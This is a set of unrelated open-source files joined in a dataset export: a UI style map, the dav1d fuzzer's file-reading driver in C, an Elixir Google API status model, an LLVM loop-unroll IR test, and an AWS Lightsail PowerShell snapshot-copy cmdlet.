"height": "30px",
"overflow": "hidden"
},
"taskItemTimeAreaNode": {
"height": "30px",
"max-width": "140px",
"overflow": "hidden"
},
"taskItemActivityNode":{
"height": "30px",
"overflow": "hidden",
"margin-right": "120px"
},
"taskItemActionNode": {
"height": "30px",
"float": "right",
"width": "120px"
},
"taskActionResetNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "5px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/reset.png) no-repeat center center"
},
"taskActionResetNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/reset_over.png) no-repeat center center",
"background-color": "#666"
},
"taskActionResetNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"taskActionFlowNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "5px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/send.png) no-repeat center center"
},
"taskActionFlowNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/send_over.png) no-repeat center center",
"background-color": "#666"
},
"taskActionFlowNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"taskActionDeleteNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "5px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delete.png) no-repeat center center"
},
"taskActionDeleteNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delete_over.png) no-repeat center center",
"background-color": "#666"
},
"taskActionDeleteNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"readActionFlagNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "5px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/flag.png) no-repeat center center"
},
"readActionFlagNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/flag_over.png) no-repeat center center",
"background-color": "#666"
},
"readActionFlagNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"relativeTop": {
"min-height": "40px",
"height": "100%",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/groupTop.png) no-repeat center bottom"
},
"relativeCenter": {
"min-height": "40px",
"height": "100%",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/groupCenter.png) center top"
},
"relativeBottom": {
"min-height": "40px",
"height": "100%",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/groupBottom.png) center top"
},
"noListText": {
"color": "#999",
"height": "30px",
"line-height": "30px",
"margin-left": "60px",
"position": "relative",
"top": "-30px"
},
"filterViewNode": {
"height": "20px",
"line-height": "20px",
"padding": "3px 10px",
"float": "left",
"margin-right": "5px",
"margin-top": "7px",
"border": "1px solid #CCC",
"cursor": "pointer",
"background-color": "#FFF",
"border-radius": "5px",
"color": "#000"
},
"filterViewNode_current": {
"border": "1px solid #ff7010",
"color": "#ff7010",
"background-color": "#FFF",
"border-radius": "5px"
},
"viewTableNode": {
"margin": "10px 0px"
},
"viewHeadTh":{
"height": "30px",
"line-height": "30px",
"color": "#666666",
"background-color": "#DFDFDF",
"font-size": "14px",
"text-align": "left",
"padding-left": "16px"
},
"viewContentTrNode": {
},
"viewContentTdNode": {
"font-size": "14px",
"color": "#666666",
"height": "30px",
"padding": "3px 5px",
"border-bottom": "1px solid #CCC"
},
"viewContentGroupTdNode": {
"padding": "3px 5px",
"border-bottom": "1px solid #CCC",
"background-color": "#F9F9F9"
},
"viewContentTdGroupNode": {
"overflow": "hidden",
"cursor": "pointer"
},
"viewContentTdGroupIconNode": {
"float": "left",
"width": "20px",
"height": "20px",
"background": "url("+"../x_component_process_ViewDesigner/$View/default/icon/right.png) center center no-repeat",
},
"viewContentTdGroupTextNode": {
"height": "20px",
"font-weight": "bold",
"line-height": "20px",
"margin-left": "20px"
},
"statListNode": {
"min-height": "40px",
"overflow": "hidden",
"border-bottom": "0px solid #999"
},
"statChartAreaNode": {
"height": "300px",
"overflow": "hidden",
"border": "1px solid #999"
},
"statTableAreaNode": {
"margin-top": "10px",
"max-height": "600px",
"overflow": "auto"
},
"statTableNode": {
"border-left": "1px solid #DFDFDF",
"border-top": "1px solid #DFDFDF",
"background-color": "#FFF",
"width": "100%"
},
"statHeadTh": {
"height": "30px",
"line-height": "30px",
"background-color": "#f0f8ff",
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF"
},
"statContentTdNode": {
"text-align": "center",
"padding": "3px",
"background-color": "#fff",
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF"
},
"statContentTdNode_selected": {
"background-color":"#faebd7"
},
"statChartFlagAreaNode": {
"width": "180px",
"height": "300px",
"float": "left",
"background-color": "#EEE",
"overflow": "auto",
"padding": " 10px 10px 15px 20px"
},
"statChartNode": {
//"margin-left": "180px",
"height": "300px",
"background-color": "#FFF",
"overflow": "hidden"
},
"noElementNode": {
"text-align": "center",
"padding": "20px",
"height": "60px",
"line-height": "60px",
"margin-top": "10px",
"margin-left": "0px",
"color": "#888",
"cursor": "pointer",
"font-size": "16px"
},
"statAllSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"height": "20px",
"width": "30px",
"overflow": "hidden",
"cursor": "pointer",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/checkAll.png) center center no-repeat",
"padding": "3px"
},
"statAllColSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"height": "20px",
"cursor": "pointer",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/checkAllCol.png) center center no-repeat",
"padding": "3px"
},
"statColSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/check.png) center center no-repeat",
"cursor": "pointer",
"height": "20px",
"padding": "3px"
},
"statAllRowSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"height": "20px",
"cursor": "pointer",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/checkAllRow.png) center center no-repeat",
"padding": "3px"
},
"statRowSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/check.png) center center no-repeat",
"cursor": "pointer",
"width": "30px",
"padding": "3px"
},
"statTableSelectedTd": {
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/checked.png) center center no-repeat"
},
"statTableSelectTd": {
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/check.png) center center no-repeat"
},
"ststChartFlagNode": {
"height": "30x",
"margin": "5px 5px 0px 0px",
"background-color": "#EEE",
"cursor": "default"
},
"ststChartFlagColorNode": {
"height": "24px",
"width": "24px",
"float": "left",
"box-shadow": "0px 0px 0px #FFF"
},
"ststChartFlagColorNode_over": {
"box-shadow": "2px 2px 5px #333"
},
"ststChartFlagNameNode": {
"height": "24px",
"line-height": "24px",
"font-size": "14px",
"margin-left": "34px",
"overflow": "hidden"
}
} | {
"pile_set_name": "Github"
} |
/*
* Copyright © 2018, VideoLAN and dav1d authors
* Copyright © 2018, Janne Grunau
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "config.h"
#include <errno.h>
#include <inttypes.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include "dav1d_fuzzer.h"
// expects ivf input
int main(const int argc, char *const *const argv) {
int ret = -1;
FILE *f = NULL;
int64_t fsize;
const char *filename = NULL;
uint8_t *data = NULL;
size_t size = 0;
if (argc != 2) {
fprintf(stdout, "Usage:\n%s fuzzing_testcase.ivf\n", argv[0]);
return -1;
}
filename = argv[1];
if (!(f = fopen(filename, "rb"))) {
fprintf(stderr, "failed to open %s: %s\n", filename, strerror(errno));
goto error;
}
if (fseeko(f, 0, SEEK_END) == -1) {
fprintf(stderr, "fseek(%s, 0, SEEK_END) failed: %s\n", filename,
strerror(errno));
goto error;
}
if ((fsize = ftello(f)) == -1) {
fprintf(stderr, "ftell(%s) failed: %s\n", filename, strerror(errno));
goto error;
}
rewind(f);
if (fsize < 0 || fsize > INT_MAX) {
fprintf(stderr, "%s is too large: %"PRId64"\n", filename, fsize);
goto error;
}
size = (size_t)fsize;
if (!(data = malloc(size))) {
fprintf(stderr, "failed to allocate: %zu bytes\n", size);
goto error;
}
if (fread(data, size, 1, f) == size) {
fprintf(stderr, "failed to read %zu bytes from %s: %s\n", size,
filename, strerror(errno));
goto error;
}
ret = LLVMFuzzerTestOneInput(data, size);
error:
free(data);
if (f) fclose(f);
return ret;
}
| {
"pile_set_name": "Github"
} |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# NOTE: This file is auto generated by the elixir code generator program.
# Do not edit this file manually.
defmodule GoogleApi.MachineLearning.V1.Model.GoogleRpc_Status do
@moduledoc """
The `Status` type defines a logical error model that is suitable for different programming environments, including REST APIs and RPC APIs. It is used by [gRPC](https://github.com/grpc). Each `Status` message contains three pieces of data: error code, error message, and error details. You can find out more about this error model and how to work with it in the [API Design Guide](https://cloud.google.com/apis/design/errors).
## Attributes
* `code` (*type:* `integer()`, *default:* `nil`) - The status code, which should be an enum value of google.rpc.Code.
* `details` (*type:* `list(map())`, *default:* `nil`) - A list of messages that carry the error details. There is a common set of message types for APIs to use.
* `message` (*type:* `String.t`, *default:* `nil`) - A developer-facing error message, which should be in English. Any user-facing error message should be localized and sent in the google.rpc.Status.details field, or localized by the client.
"""
use GoogleApi.Gax.ModelBase
@type t :: %__MODULE__{
:code => integer(),
:details => list(map()),
:message => String.t()
}
field(:code)
field(:details, type: :list)
field(:message)
end
defimpl Poison.Decoder, for: GoogleApi.MachineLearning.V1.Model.GoogleRpc_Status do
def decode(value, options) do
GoogleApi.MachineLearning.V1.Model.GoogleRpc_Status.decode(value, options)
end
end
defimpl Poison.Encoder, for: GoogleApi.MachineLearning.V1.Model.GoogleRpc_Status do
def encode(value, options) do
GoogleApi.Gax.ModelBase.encode(value, options)
end
end
| {
"pile_set_name": "Github"
} |
; Check that we don't crash on corner cases.
; RUN: opt < %s -S -loop-unroll -unroll-max-iteration-count-to-analyze=1000 -unroll-threshold=1 -unroll-max-percent-threshold-boost=200 -o /dev/null
; RUN: opt < %s -S -passes='require<opt-remark-emit>,loop(unroll-full)' -unroll-max-iteration-count-to-analyze=1000 -unroll-threshold=1 -unroll-max-percent-threshold-boost=200 -o /dev/null
target datalayout = "e-m:o-i64:64-f80:128-n8:16:32:64-S128"
@known_constant = internal unnamed_addr constant [10 x i32] [i32 1, i32 1, i32 1, i32 1, i32 1, i32 1, i32 1, i32 1, i32 1, i32 1], align 16
define void @foo1() {
entry:
br label %for.body
for.body:
%phi = phi i64 [ 0, %entry ], [ %inc, %for.body ]
%idx = zext i32 undef to i64
%add.ptr = getelementptr inbounds i64, i64* null, i64 %idx
%inc = add nuw nsw i64 %phi, 1
%cmp = icmp ult i64 %inc, 999
br i1 %cmp, label %for.body, label %for.exit
for.exit:
ret void
}
define void @foo2() {
entry:
br label %for.body
for.body:
%phi = phi i64 [ 0, %entry ], [ %inc, %for.body ]
%x = getelementptr i32, <4 x i32*> undef, <4 x i32> <i32 1, i32 1, i32 1, i32 1>
%inc = add nuw nsw i64 %phi, 1
%cmp = icmp ult i64 %inc, 999
br i1 %cmp, label %for.body, label %for.exit
for.exit:
ret void
}
define void @cmp_undef() {
entry:
br label %for.body
for.body: ; preds = %for.inc, %entry
%iv.0 = phi i64 [ 0, %entry ], [ %iv.1, %for.inc ]
%arrayidx1 = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %iv.0
%x1 = load i32, i32* %arrayidx1, align 4
%cmp = icmp eq i32 %x1, undef
br i1 %cmp, label %if.then, label %for.inc
if.then: ; preds = %for.body
br label %for.inc
for.inc: ; preds = %for.body, %if.then
%iv.1 = add nuw nsw i64 %iv.0, 1
%exitcond = icmp eq i64 %iv.1, 10
br i1 %exitcond, label %for.end, label %for.body
for.end: ; preds = %for.inc
ret void
}
define void @switch() {
entry:
br label %for.body
for.body:
%iv.0 = phi i64 [ 0, %entry ], [ %iv.1, %for.inc ]
%arrayidx1 = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %iv.0
%x1 = load i32, i32* %arrayidx1, align 4
switch i32 %x1, label %l1 [
]
l1:
%x2 = add i32 %x1, 2
br label %for.inc
for.inc:
%iv.1 = add nuw nsw i64 %iv.0, 1
%exitcond = icmp eq i64 %iv.1, 10
br i1 %exitcond, label %for.end, label %for.body
for.end:
ret void
}
define <4 x i32> @vec_load() {
entry:
br label %for.body
for.body:
%phi = phi i64 [ 0, %entry ], [ %inc, %for.body ]
%vec_phi = phi <4 x i32> [ <i32 0, i32 0, i32 0, i32 0>, %entry ], [ %r, %for.body ]
%arrayidx = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %phi
%bc = bitcast i32* %arrayidx to <4 x i32>*
%x = load <4 x i32>, < 4 x i32>* %bc, align 4
%r = add <4 x i32> %x, %vec_phi
%inc = add nuw nsw i64 %phi, 1
%cmp = icmp ult i64 %inc, 999
br i1 %cmp, label %for.body, label %for.exit
for.exit:
ret <4 x i32> %r
}
define void @ptrtoint_cast() optsize {
entry:
br label %for.body
for.body:
br i1 true, label %for.inc, label %if.then
if.then:
%arraydecay = getelementptr inbounds [1 x i32], [1 x i32]* null, i64 0, i64 0
%x = ptrtoint i32* %arraydecay to i64
br label %for.inc
for.inc:
br i1 false, label %for.body, label %for.cond.cleanup
for.cond.cleanup:
ret void
}
define void @ptrtoint_cast2() {
entry:
br i1 false, label %for.body.lr.ph, label %exit
for.body.lr.ph:
br label %for.body
for.body:
%iv = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.body ]
%offset = getelementptr inbounds float, float* null, i32 3
%bc = bitcast float* %offset to i64*
%inc = add nuw nsw i32 %iv, 1
br i1 false, label %for.body, label %exit
exit:
ret void
}
@i = external global i32, align 4
define void @folded_not_to_constantint() {
entry:
br label %for.body
for.body:
%iv = phi i32 [ 0, %entry ], [ %inc, %for.inc ]
%m = phi i32* [ @i, %entry ], [ %m, %for.inc ]
br i1 undef, label %if.else, label %if.then
if.then:
unreachable
if.else:
%cmp = icmp ult i32* %m, null
br i1 %cmp, label %cond.false, label %for.inc
cond.false:
unreachable
for.inc:
%inc = add nuw nsw i32 %iv, 1
%cmp2 = icmp ult i32 %inc, 10
br i1 %cmp2, label %for.body, label %for.end
for.end:
ret void
}
define void @index_too_large() {
entry:
br label %for.body
for.body:
%iv = phi i64 [ -73631599, %entry ], [ %iv.next, %for.inc ]
br i1 undef, label %for.body2, label %for.inc
for.body2:
%idx = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %iv
%x = load i32, i32* %idx, align 1
br label %for.inc
for.inc:
%iv.next = add nsw i64 %iv, -1
br i1 undef, label %for.body, label %for.end
for.end:
ret void
}
define void @cmp_type_mismatch() {
entry:
br label %for.header
for.header:
br label %for.body
for.body:
%d = phi i32* [ null, %for.header ]
%cmp = icmp eq i32* %d, null
br i1 undef, label %for.end, label %for.header
for.end:
ret void
}
define void @load_type_mismatch() {
entry:
br label %for.body
for.body:
%iv.0 = phi i64 [ 0, %entry ], [ %iv.1, %for.body ]
%arrayidx1 = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %iv.0
%bc = bitcast i32* %arrayidx1 to i64*
%x1 = load i64, i64* %bc, align 4
%x2 = add i64 10, %x1
%iv.1 = add nuw nsw i64 %iv.0, 1
%exitcond = icmp eq i64 %iv.1, 10
br i1 %exitcond, label %for.end, label %for.body
for.end:
ret void
}
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright 2012-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use
* this file except in compliance with the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file.
* This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
* *****************************************************************************
*
* AWS Tools for Windows (TM) PowerShell (TM)
*
*/
using System;
using System.Collections.Generic;
using System.Linq;
using System.Management.Automation;
using System.Text;
using Amazon.PowerShell.Common;
using Amazon.Runtime;
using Amazon.Lightsail;
using Amazon.Lightsail.Model;
namespace Amazon.PowerShell.Cmdlets.LS
{
/// <summary>
/// Copies a manual snapshot of an instance or disk as another manual snapshot, or copies
/// an automatic snapshot of an instance or disk as a manual snapshot. This operation
/// can also be used to copy a manual or automatic snapshot of an instance or a disk from
/// one AWS Region to another in Amazon Lightsail.
///
///
/// <para>
/// When copying a <i>manual snapshot</i>, be sure to define the <code>source region</code>,
/// <code>source snapshot name</code>, and <code>target snapshot name</code> parameters.
/// </para><para>
/// When copying an <i>automatic snapshot</i>, be sure to define the <code>source region</code>,
/// <code>source resource name</code>, <code>target snapshot name</code>, and either the
/// <code>restore date</code> or the <code>use latest restorable auto snapshot</code>
/// parameters.
/// </para>
/// </summary>
[Cmdlet("Copy", "LSSnapshot", SupportsShouldProcess = true, ConfirmImpact = ConfirmImpact.Medium)]
[OutputType("Amazon.Lightsail.Model.Operation")]
[AWSCmdlet("Calls the Amazon Lightsail CopySnapshot API operation.", Operation = new[] {"CopySnapshot"}, SelectReturnType = typeof(Amazon.Lightsail.Model.CopySnapshotResponse))]
[AWSCmdletOutput("Amazon.Lightsail.Model.Operation or Amazon.Lightsail.Model.CopySnapshotResponse",
"This cmdlet returns a collection of Amazon.Lightsail.Model.Operation objects.",
"The service call response (type Amazon.Lightsail.Model.CopySnapshotResponse) can also be referenced from properties attached to the cmdlet entry in the $AWSHistory stack."
)]
public partial class CopyLSSnapshotCmdlet : AmazonLightsailClientCmdlet, IExecutor
{
#region Parameter RestoreDate
/// <summary>
/// <para>
/// <para>The date of the source automatic snapshot to copy. Use the <code>get auto snapshots</code>
/// operation to identify the dates of the available automatic snapshots.</para><para>Constraints:</para><ul><li><para>Must be specified in <code>YYYY-MM-DD</code> format.</para></li><li><para>This parameter cannot be defined together with the <code>use latest restorable auto
/// snapshot</code> parameter. The <code>restore date</code> and <code>use latest restorable
/// auto snapshot</code> parameters are mutually exclusive.</para></li><li><para>Define this parameter only when copying an automatic snapshot as a manual snapshot.
/// For more information, see the <a href="https://lightsail.aws.amazon.com/ls/docs/en_us/articles/amazon-lightsail-keeping-automatic-snapshots">Lightsail
/// Dev Guide</a>.</para></li></ul>
/// </para>
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public System.String RestoreDate { get; set; }
#endregion
#region Parameter SourceRegion
/// <summary>
/// <para>
/// <para>The AWS Region where the source manual or automatic snapshot is located.</para>
/// </para>
/// </summary>
#if !MODULAR
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
#else
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true, Mandatory = true)]
[System.Management.Automation.AllowNull]
#endif
[Amazon.PowerShell.Common.AWSRequiredParameter]
[AWSConstantClassSource("Amazon.Lightsail.RegionName")]
public Amazon.Lightsail.RegionName SourceRegion { get; set; }
#endregion
#region Parameter SourceResourceName
/// <summary>
/// <para>
/// <para>The name of the source instance or disk from which the source automatic snapshot was
/// created.</para><para>Constraint:</para><ul><li><para>Define this parameter only when copying an automatic snapshot as a manual snapshot.
/// For more information, see the <a href="https://lightsail.aws.amazon.com/ls/docs/en_us/articles/amazon-lightsail-keeping-automatic-snapshots">Lightsail
/// Dev Guide</a>.</para></li></ul>
/// </para>
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public System.String SourceResourceName { get; set; }
#endregion
#region Parameter SourceSnapshotName
/// <summary>
/// <para>
/// <para>The name of the source manual snapshot to copy.</para><para>Constraint:</para><ul><li><para>Define this parameter only when copying a manual snapshot as another manual snapshot.</para></li></ul>
/// </para>
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public System.String SourceSnapshotName { get; set; }
#endregion
#region Parameter TargetSnapshotName
/// <summary>
/// <para>
/// <para>The name of the new manual snapshot to be created as a copy.</para>
/// </para>
/// </summary>
#if !MODULAR
[System.Management.Automation.Parameter(Position = 0, ValueFromPipelineByPropertyName = true, ValueFromPipeline = true)]
#else
[System.Management.Automation.Parameter(Position = 0, ValueFromPipelineByPropertyName = true, ValueFromPipeline = true, Mandatory = true)]
[System.Management.Automation.AllowEmptyString]
[System.Management.Automation.AllowNull]
#endif
[Amazon.PowerShell.Common.AWSRequiredParameter]
public System.String TargetSnapshotName { get; set; }
#endregion
#region Parameter UseLatestRestorableAutoSnapshot
/// <summary>
/// <para>
/// <para>A Boolean value to indicate whether to use the latest available automatic snapshot
/// of the specified source instance or disk.</para><para>Constraints:</para><ul><li><para>This parameter cannot be defined together with the <code>restore date</code> parameter.
/// The <code>use latest restorable auto snapshot</code> and <code>restore date</code>
/// parameters are mutually exclusive.</para></li><li><para>Define this parameter only when copying an automatic snapshot as a manual snapshot.
/// For more information, see the <a href="https://lightsail.aws.amazon.com/ls/docs/en_us/articles/amazon-lightsail-keeping-automatic-snapshots">Lightsail
/// Dev Guide</a>.</para></li></ul>
/// </para>
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public System.Boolean? UseLatestRestorableAutoSnapshot { get; set; }
#endregion
#region Parameter Select
/// <summary>
/// Use the -Select parameter to control the cmdlet output. The default value is 'Operations'.
/// Specifying -Select '*' will result in the cmdlet returning the whole service response (Amazon.Lightsail.Model.CopySnapshotResponse).
/// Specifying the name of a property of type Amazon.Lightsail.Model.CopySnapshotResponse will result in that property being returned.
/// Specifying -Select '^ParameterName' will result in the cmdlet returning the selected cmdlet parameter value.
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public string Select { get; set; } = "Operations";
#endregion
#region Parameter PassThru
/// <summary>
/// Changes the cmdlet behavior to return the value passed to the TargetSnapshotName parameter.
/// The -PassThru parameter is deprecated, use -Select '^TargetSnapshotName' instead. This parameter will be removed in a future version.
/// </summary>
[System.Obsolete("The -PassThru parameter is deprecated, use -Select '^TargetSnapshotName' instead. This parameter will be removed in a future version.")]
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public SwitchParameter PassThru { get; set; }
#endregion
#region Parameter Force
/// <summary>
/// This parameter overrides confirmation prompts to force
/// the cmdlet to continue its operation. This parameter should always
/// be used with caution.
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public SwitchParameter Force { get; set; }
#endregion
protected override void ProcessRecord()
{
base.ProcessRecord();
var resourceIdentifiersText = FormatParameterValuesForConfirmationMsg(nameof(this.TargetSnapshotName), MyInvocation.BoundParameters);
if (!ConfirmShouldProceed(this.Force.IsPresent, resourceIdentifiersText, "Copy-LSSnapshot (CopySnapshot)"))
{
return;
}
var context = new CmdletContext();
// allow for manipulation of parameters prior to loading into context
PreExecutionContextLoad(context);
#pragma warning disable CS0618, CS0612 //A class member was marked with the Obsolete attribute
if (ParameterWasBound(nameof(this.Select)))
{
context.Select = CreateSelectDelegate<Amazon.Lightsail.Model.CopySnapshotResponse, CopyLSSnapshotCmdlet>(Select) ??
throw new System.ArgumentException("Invalid value for -Select parameter.", nameof(this.Select));
if (this.PassThru.IsPresent)
{
throw new System.ArgumentException("-PassThru cannot be used when -Select is specified.", nameof(this.Select));
}
}
else if (this.PassThru.IsPresent)
{
context.Select = (response, cmdlet) => this.TargetSnapshotName;
}
#pragma warning restore CS0618, CS0612 //A class member was marked with the Obsolete attribute
context.RestoreDate = this.RestoreDate;
context.SourceRegion = this.SourceRegion;
#if MODULAR
if (this.SourceRegion == null && ParameterWasBound(nameof(this.SourceRegion)))
{
WriteWarning("You are passing $null as a value for parameter SourceRegion which is marked as required. In case you believe this parameter was incorrectly marked as required, report this by opening an issue at https://github.com/aws/aws-tools-for-powershell/issues.");
}
#endif
context.SourceResourceName = this.SourceResourceName;
context.SourceSnapshotName = this.SourceSnapshotName;
context.TargetSnapshotName = this.TargetSnapshotName;
#if MODULAR
if (this.TargetSnapshotName == null && ParameterWasBound(nameof(this.TargetSnapshotName)))
{
WriteWarning("You are passing $null as a value for parameter TargetSnapshotName which is marked as required. In case you believe this parameter was incorrectly marked as required, report this by opening an issue at https://github.com/aws/aws-tools-for-powershell/issues.");
}
#endif
context.UseLatestRestorableAutoSnapshot = this.UseLatestRestorableAutoSnapshot;
// allow further manipulation of loaded context prior to processing
PostExecutionContextLoad(context);
var output = Execute(context) as CmdletOutput;
ProcessOutput(output);
}
#region IExecutor Members
public object Execute(ExecutorContext context)
{
var cmdletContext = context as CmdletContext;
// create request
var request = new Amazon.Lightsail.Model.CopySnapshotRequest();
if (cmdletContext.RestoreDate != null)
{
request.RestoreDate = cmdletContext.RestoreDate;
}
if (cmdletContext.SourceRegion != null)
{
request.SourceRegion = cmdletContext.SourceRegion;
}
if (cmdletContext.SourceResourceName != null)
{
request.SourceResourceName = cmdletContext.SourceResourceName;
}
if (cmdletContext.SourceSnapshotName != null)
{
request.SourceSnapshotName = cmdletContext.SourceSnapshotName;
}
if (cmdletContext.TargetSnapshotName != null)
{
request.TargetSnapshotName = cmdletContext.TargetSnapshotName;
}
if (cmdletContext.UseLatestRestorableAutoSnapshot != null)
{
request.UseLatestRestorableAutoSnapshot = cmdletContext.UseLatestRestorableAutoSnapshot.Value;
}
CmdletOutput output;
// issue call
var client = Client ?? CreateClient(_CurrentCredentials, _RegionEndpoint);
try
{
var response = CallAWSServiceOperation(client, request);
object pipelineOutput = null;
pipelineOutput = cmdletContext.Select(response, this);
output = new CmdletOutput
{
PipelineOutput = pipelineOutput,
ServiceResponse = response
};
}
catch (Exception e)
{
output = new CmdletOutput { ErrorResponse = e };
}
return output;
}
public ExecutorContext CreateContext()
{
return new CmdletContext();
}
#endregion
#region AWS Service Operation Call
private Amazon.Lightsail.Model.CopySnapshotResponse CallAWSServiceOperation(IAmazonLightsail client, Amazon.Lightsail.Model.CopySnapshotRequest request)
{
Utils.Common.WriteVerboseEndpointMessage(this, client.Config, "Amazon Lightsail", "CopySnapshot");
try
{
#if DESKTOP
return client.CopySnapshot(request);
#elif CORECLR
return client.CopySnapshotAsync(request).GetAwaiter().GetResult();
#else
#error "Unknown build edition"
#endif
}
catch (AmazonServiceException exc)
{
var webException = exc.InnerException as System.Net.WebException;
if (webException != null)
{
throw new Exception(Utils.Common.FormatNameResolutionFailureMessage(client.Config, webException.Message), webException);
}
throw;
}
}
#endregion
internal partial class CmdletContext : ExecutorContext
{
public System.String RestoreDate { get; set; }
public Amazon.Lightsail.RegionName SourceRegion { get; set; }
public System.String SourceResourceName { get; set; }
public System.String SourceSnapshotName { get; set; }
public System.String TargetSnapshotName { get; set; }
public System.Boolean? UseLatestRestorableAutoSnapshot { get; set; }
public System.Func<Amazon.Lightsail.Model.CopySnapshotResponse, CopyLSSnapshotCmdlet, object> Select { get; set; } =
(response, cmdlet) => response.Operations;
}
}
}
| {
